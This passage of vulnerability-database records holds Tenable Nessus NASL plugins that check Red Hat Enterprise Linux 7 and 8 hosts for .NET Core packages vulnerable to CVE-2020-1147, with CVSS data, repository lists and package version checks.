'content/tus/rhel8/8.4/x86_64/nfv/os',\n 'content/tus/rhel8/8.4/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.4/x86_64/rt/debug',\n 'content/tus/rhel8/8.4/x86_64/rt/os',\n 'content/tus/rhel8/8.4/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'aspnetcore-runtime-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'aspnetcore-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-3.1.106-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-apphost-pack-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-hostfxr-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-3.1-3.1.106-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-templates-3.1-3.1.106-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'netstandard-targeting-pack-2.1-3.1.106-1.el8_2', 'sp':'4', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.6/x86_64/appstream/debug',\n 'content/aus/rhel8/8.6/x86_64/appstream/os',\n 'content/aus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.6/x86_64/baseos/debug',\n 'content/aus/rhel8/8.6/x86_64/baseos/os',\n 'content/aus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.6/x86_64/appstream/os',\n 'content/e4s/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.6/x86_64/baseos/os',\n 'content/e4s/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.6/x86_64/sap/debug',\n 'content/e4s/rhel8/8.6/x86_64/sap/os',\n 'content/e4s/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/appstream/debug',\n 'content/eus/rhel8/8.6/x86_64/appstream/os',\n 'content/eus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/baseos/debug',\n 'content/eus/rhel8/8.6/x86_64/baseos/os',\n 'content/eus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.6/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.6/x86_64/highavailability/os',\n 'content/eus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.6/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.6/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/sap/debug',\n 'content/eus/rhel8/8.6/x86_64/sap/os',\n 'content/eus/rhel8/8.6/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.6/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.6/x86_64/supplementary/os',\n 'content/eus/rhel8/8.6/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/appstream/debug',\n 'content/tus/rhel8/8.6/x86_64/appstream/os',\n 'content/tus/rhel8/8.6/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/baseos/debug',\n 'content/tus/rhel8/8.6/x86_64/baseos/os',\n 'content/tus/rhel8/8.6/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.6/x86_64/highavailability/os',\n 'content/tus/rhel8/8.6/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.6/x86_64/rt/os',\n 'content/tus/rhel8/8.6/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'aspnetcore-runtime-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'aspnetcore-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-3.1.106-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-apphost-pack-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-hostfxr-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-3.1-3.1.106-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-targeting-pack-3.1-3.1.6-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-templates-3.1-3.1.106-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'netstandard-targeting-pack-2.1-3.1.106-1.el8_2', 'sp':'6', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel8/8/x86_64/appstream/debug',\n 'content/dist/rhel8/8/x86_64/appstream/os',\n 'content/dist/rhel8/8/x86_64/appstream/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/baseos/debug',\n 'content/dist/rhel8/8/x86_64/baseos/os',\n 'content/dist/rhel8/8/x86_64/baseos/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/codeready-builder/debug',\n 'content/dist/rhel8/8/x86_64/codeready-builder/os',\n 'content/dist/rhel8/8/x86_64/codeready-builder/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/highavailability/debug',\n 'content/dist/rhel8/8/x86_64/highavailability/os',\n 'content/dist/rhel8/8/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/nfv/debug',\n 'content/dist/rhel8/8/x86_64/nfv/os',\n 'content/dist/rhel8/8/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/resilientstorage/debug',\n 'content/dist/rhel8/8/x86_64/resilientstorage/os',\n 'content/dist/rhel8/8/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/rt/debug',\n 'content/dist/rhel8/8/x86_64/rt/os',\n 'content/dist/rhel8/8/x86_64/rt/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap-solutions/debug',\n 'content/dist/rhel8/8/x86_64/sap-solutions/os',\n 'content/dist/rhel8/8/x86_64/sap-solutions/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/sap/debug',\n 'content/dist/rhel8/8/x86_64/sap/os',\n 'content/dist/rhel8/8/x86_64/sap/source/SRPMS',\n 'content/dist/rhel8/8/x86_64/supplementary/debug',\n 'content/dist/rhel8/8/x86_64/supplementary/os',\n 'content/dist/rhel8/8/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'aspnetcore-runtime-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'aspnetcore-targeting-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-apphost-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-host-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-hostfxr-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-3.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-targeting-pack-3.1-3.1.6-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-templates-3.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'netstandard-targeting-pack-2.1-3.1.106-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'aspnetcore-runtime-3.1 / aspnetcore-targeting-pack-3.1 / dotnet / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:25:14", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2988 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-22T00:00:00", "type": "nessus", "title": "RHEL 8 : .NET Core (RHSA-2020:2988)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:8.1", "cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1", "p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx"], "id": "REDHAT-RHSA-2020-2988.NASL", "href": "https://www.tenable.com/plugins/nessus/138842", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2988. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138842);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2988\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0304-S\");\n\n script_name(english:\"RHEL 8 : .NET Core (RHSA-2020:2988)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2988 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1147\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2988\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1856929\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1147\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-host-fxr-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-runtime-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dotnet-sdk-2.1.5xx\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/e4s/rhel8/8.1/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.1/x86_64/appstream/os',\n 'content/e4s/rhel8/8.1/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.1/x86_64/baseos/os',\n 'content/e4s/rhel8/8.1/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.1/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.1/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.1/x86_64/sap/debug',\n 'content/e4s/rhel8/8.1/x86_64/sap/os',\n 'content/e4s/rhel8/8.1/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/appstream/debug',\n 'content/eus/rhel8/8.1/x86_64/appstream/os',\n 'content/eus/rhel8/8.1/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/baseos/debug',\n 'content/eus/rhel8/8.1/x86_64/baseos/os',\n 'content/eus/rhel8/8.1/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.1/x86_64/highavailability/os',\n 'content/eus/rhel8/8.1/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap/debug',\n 'content/eus/rhel8/8.1/x86_64/sap/os',\n 'content/eus/rhel8/8.1/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.1/x86_64/supplementary/os',\n 'content/eus/rhel8/8.1/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'dotnet-host-fxr-2.1-2.1.20-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-runtime-2.1-2.1.20-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1-2.1.516-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dotnet-sdk-2.1.5xx-2.1.516-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dotnet-host-fxr-2.1 / dotnet-runtime-2.1 / dotnet-sdk-2.1 / etc');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T14:24:55", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2937 advisory.\n\n - dotnet: XML source markup processing remote code execution (CVE-2020-1147)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "nessus", "title": "RHEL 7 : .NET Core 2.1 on Red Hat Enterprise Linux (RHSA-2020:2937)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-host", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-runtime-2.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-sdk-2.1", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-dotnet-sdk-2.1.5xx", "p-cpe:/a:redhat:enterprise_linux:rh-dotnet21-runtime"], "id": "REDHAT-RHSA-2020-2937.NASL", "href": "https://www.tenable.com/plugins/nessus/138504", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2937. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138504);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-1147\");\n script_xref(name:\"RHSA\", value:\"2020:2937\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0305-S\");\n 